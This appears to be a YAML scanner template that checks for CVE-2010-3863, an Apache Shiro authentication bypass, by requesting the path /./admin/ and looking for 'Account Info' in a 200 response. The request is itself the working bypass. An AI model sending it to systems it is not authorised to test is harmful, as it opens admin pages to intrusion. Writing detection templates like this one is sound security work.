name: cve-2010-3863
transport: http
rules:
  - method: GET
    path: /./admin/
    follow_redirects: false
    headers:
      Content-Type: application/x-www-form-urlencoded
    expression: |
      status==200 && response.body.bcontains(b'Account Info')
detail:
  author: SH1INroot
  links:
    - https://github.com/sh1inroot-alt/shiro-cve-2010-3863